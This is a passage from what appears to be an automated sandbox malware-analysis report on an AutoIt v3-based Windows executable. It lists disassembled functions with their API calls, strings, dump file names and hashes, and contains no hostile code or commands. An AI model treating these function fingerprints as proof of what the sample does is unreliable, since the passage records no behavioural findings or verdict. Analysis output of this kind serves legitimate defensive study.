                                                                                                control_flow_graph 1904 40e500-40e57c call 40bc70 GetVersionExW call 402160 call 40e660 call 40e680 1913 40e582-40e583 1904->1913 1914 427674-427679 1904->1914 1917 40e585-40e596 1913->1917 1918 40e5ba-40e5cb call 40ef60 1913->1918 1915 427683-427686 1914->1915 1916 42767b-427681 1914->1916 1920 427693-427696 1915->1920 1921 427688-427691 1915->1921 1919 4276b4-4276be 1916->1919 1922 427625-427629 1917->1922 1923 40e59c-40e59f 1917->1923 1935 40e5ec-40e60c 1918->1935 1936 40e5cd-40e5e6 GetCurrentProcess call 40ef20 1918->1936 1937 4276c6-4276ca GetSystemInfo 1919->1937 1920->1919 1927 427698-4276a8 1920->1927 1921->1919 1929 427636-427640 1922->1929 1930 42762b-427631 1922->1930 1925 40e5a5-40e5ae 1923->1925 1926 427654-427657 1923->1926 1931 40e5b4 1925->1931 1932 427645-42764f 1925->1932 1926->1918 1938 42765d-42766f 1926->1938 1933 4276b0 1927->1933 1934 4276aa-4276ae 1927->1934 1929->1918 1930->1918 1931->1918 1932->1918 1933->1919 1934->1919 1940 40e612-40e623 call 40efd0 1935->1940 1941 4276d5-4276df GetSystemInfo 1935->1941 1936->1935 1948 40e5e8 1936->1948 1937->1941 1938->1918 1940->1937 1945 40e629-40e63f call 40ef90 GetNativeSystemInfo 1940->1945 1950 40e641-40e642 FreeLibrary 1945->1950 1951 40e644-40e651 1945->1951 1948->1935 1950->1951 1952 40e653-40e654 FreeLibrary 1951->1952 1953 40e656-40e65d 1951->1953 1952->1953
                                                                                                APIs
                                                                                                • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                                                • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                                                • String ID: 0SH$#v
                                                                                                • API String ID: 3363477735-2448020801
                                                                                                • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                                                • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                                                • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                                                Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                                                • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: IsThemeActive$uxtheme.dll
                                                                                                • API String ID: 2574300362-3542929980
                                                                                                • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                                                • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                                                • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                                                Function 0040D6B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeInfoLibraryParametersSystem
                                                                                                • String ID: #v
                                                                                                • API String ID: 3403648963-554117064
                                                                                                • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                                                                • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                                                                • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                                                                Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                                                • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                                                • TranslateMessage.USER32(?), ref: 00409556
                                                                                                • DispatchMessageW.USER32(?), ref: 00409561
                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$Peek$DispatchSleepTranslate
                                                                                                • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                                                • API String ID: 1762048999-758534266
                                                                                                • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                                • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                                                • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                                                                                                • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                                                                Function 00401F20 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 214COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                • __wcsicoll.LIBCMT ref: 00402007
                                                                                                • __wcsicoll.LIBCMT ref: 0040201D
                                                                                                • __wcsicoll.LIBCMT ref: 00402033
                                                                                                  • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                                • __wcsicoll.LIBCMT ref: 00402049
                                                                                                • _wcscpy.LIBCMT ref: 0040207C
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                                                                • API String ID: 3948761352-1609664196
                                                                                                • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                                                • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                                                • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                                                • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                                                                Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                                                • __wsplitpath.LIBCMT ref: 0040E41C
                                                                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                • _wcsncat.LIBCMT ref: 0040E433
                                                                                                • __wmakepath.LIBCMT ref: 0040E44F
                                                                                                  • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                • _wcscpy.LIBCMT ref: 0040E487
                                                                                                  • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                • _wcscat.LIBCMT ref: 00427541
                                                                                                • _wcslen.LIBCMT ref: 00427551
                                                                                                • _wcslen.LIBCMT ref: 00427562
                                                                                                • _wcscat.LIBCMT ref: 0042757C
                                                                                                • _wcsncpy.LIBCMT ref: 004275BC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                                                • String ID: Include$\
                                                                                                • API String ID: 3173733714-3429789819
                                                                                                • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                                                • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                                                • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                                                                Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • _fseek.LIBCMT ref: 0045292B
                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                  • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                  • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                                • __fread_nolock.LIBCMT ref: 00452961
                                                                                                • __fread_nolock.LIBCMT ref: 00452971
                                                                                                • __fread_nolock.LIBCMT ref: 0045298A
                                                                                                • __fread_nolock.LIBCMT ref: 004529A5
                                                                                                • _fseek.LIBCMT ref: 004529BF
                                                                                                • _malloc.LIBCMT ref: 004529CA
                                                                                                • _malloc.LIBCMT ref: 004529D6
                                                                                                • __fread_nolock.LIBCMT ref: 004529E7
                                                                                                • _free.LIBCMT ref: 00452A17
                                                                                                • _free.LIBCMT ref: 00452A20
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                                                • String ID:
                                                                                                • API String ID: 1255752989-0
                                                                                                • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                                • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                                                • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                                                • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                                                                                Function 00452719 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                • String ID: FILE
                                                                                                • API String ID: 3888824918-3121273764
                                                                                                • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                                                • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                                                • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                                                                                Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                • ImageList_ReplaceIcon.COMCTL32(0099F230,000000FF,00000000), ref: 00410552
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                • API String ID: 2914291525-1005189915
                                                                                                • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                                                • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                                                • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                                                                Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                                                • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                                                • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                                                • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                                                • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                                                • RegisterClassExW.USER32(?), ref: 0041045D
                                                                                                  • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                                                  • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                                                  • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                                                  • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                                                  • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                                                  • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                                                  • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(0099F230,000000FF,00000000), ref: 00410552
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                • String ID: #$0$AutoIt v3
                                                                                                • API String ID: 423443420-4155596026
                                                                                                • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                                                • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                                                • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                                                Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: _malloc
                                                                                                • String ID: Default
                                                                                                • API String ID: 1579825452-753088835
                                                                                                • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                                • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                                                • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                                                • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                                                                                Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
